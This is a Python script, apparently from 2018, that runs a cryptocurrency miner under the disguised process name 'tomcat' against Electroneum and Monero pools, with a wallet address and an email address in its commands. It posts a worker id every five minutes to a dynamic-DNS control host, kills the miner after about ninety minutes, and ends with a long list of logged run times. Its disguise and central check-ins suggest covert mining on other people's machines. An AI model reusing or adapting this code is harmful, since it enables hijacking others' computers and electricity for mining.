import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:31:01.500110
#2018-02-17 16:16:03.917160
#2018-02-17 18:03:02.074988
#2018-02-17 19:50:06.468106
#2018-02-17 21:39:05.199109
#2018-02-17 23:23:07.066462
#2018-02-18 01:12:06.853474
#2018-02-18 03:01:06.362460
#2018-02-18 04:50:08.915845
#2018-02-18 06:41:05.344860
#2018-02-18 08:29:07.284947
#2018-02-18 10:17:03.644282
#2018-02-18 12:03:05.512947
#2018-02-18 13:48:03.641439
#2018-02-18 15:38:07.642709
#2018-02-18 17:27:01.478428
#2018-02-18 19:14:05.410979
#2018-02-18 21:00:10.434084
#2018-02-18 22:46:03.633976
#2018-02-19 00:35:05.454553
#2018-02-19 02:21:01.858627
#2018-02-19 04:08:01.318904
#2018-02-19 05:52:01.328017
#2018-02-19 07:42:08.271027
#2018-02-19 09:31:06.792025
#2018-02-19 11:21:08.720273
#2018-02-19 13:08:08.897947
#2018-02-19 14:57:11.023983
#2018-02-19 16:44:10.449327
#2018-02-19 18:32:03.655974
#2018-02-19 20:18:07.974748
#2018-02-19 22:07:03.246036
#2018-02-19 23:52:04.099357
#2018-02-20 01:38:06.703047
#2018-02-20 03:26:01.669102
#2018-02-20 05:13:04.231639
#2018-02-20 06:55:06.043183
#2018-02-20 08:41:05.778570
#2018-02-20 10:25:08.160028
#2018-02-20 12:10:11.234832
#2018-02-20 13:59:06.531945
#2018-02-20 15:43:01.244882
#2018-02-20 17:29:05.956875
#2018-02-20 19:18:08.785349
#2018-02-20 21:06:07.973061
#2018-02-20 22:53:05.262704
#2018-02-21 00:35:08.655304
#2018-02-21 02:21:05.836408
#2018-02-21 04:07:07.246730
#2018-02-21 05:54:04.206832
#2018-02-21 07:42:08.387725
#2018-02-21 09:27:04.714425
#2018-02-21 11:16:01.614980
#2018-02-21 13:03:09.510656
#2018-02-21 14:49:06.988240
#2018-02-21 16:38:09.467005
#2018-02-21 18:27:09.981231
#2018-02-21 20:12:07.134907
#2018-02-21 21:59:02.124658
#2018-02-21 23:47:06.362739
#2018-02-22 01:37:06.047092
#2018-02-22 03:26:03.295979
#2018-02-22 05:13:01.522744
#2018-02-22 06:57:01.794578
#2018-02-22 08:44:05.647298
#2018-02-22 10:32:01.999960
#2018-02-22 12:18:06.631291
#2018-02-22 14:04:06.561007
#2018-02-22 15:51:06.960103
#2018-02-22 17:38:10.403934
#2018-02-22 19:26:06.864565
#2018-02-22 21:19:01.759788
#2018-02-22 23:04:09.158513
#2018-02-23 00:52:04.650977
#2018-02-23 02:41:05.332118
#2018-02-23 04:31:06.566945
#2018-02-23 06:17:06.682646
#2018-02-23 08:04:01.361017
#2018-02-23 10:20:10.459169
#2018-02-23 12:14:04.234544
#2018-02-23 14:00:10.243224
#2018-02-23 15:52:01.856753
#2018-02-23 17:37:07.954080
#2018-02-23 19:23:03.708941
#2018-02-23 21:07:07.775752
#2018-02-23 22:53:03.727142
#2018-02-24 00:40:10.488114
#2018-02-24 02:31:05.490702
#2018-02-24 04:24:05.442521
#2018-02-24 06:10:01.782900
#2018-02-24 07:57:07.506846
#2018-02-24 09:42:06.453631
#2018-02-24 11:38:04.191931
#2018-02-24 13:28:05.566209
#2018-02-24 15:17:04.364225
#2018-02-24 17:06:05.526776
#2018-02-24 18:57:03.879789
#2018-02-24 20:44:04.165601
#2018-02-24 22:58:06.780981
#2018-02-25 02:16:02.096967
#2018-02-25 05:46:05.300772
#2018-02-25 11:37:06.940797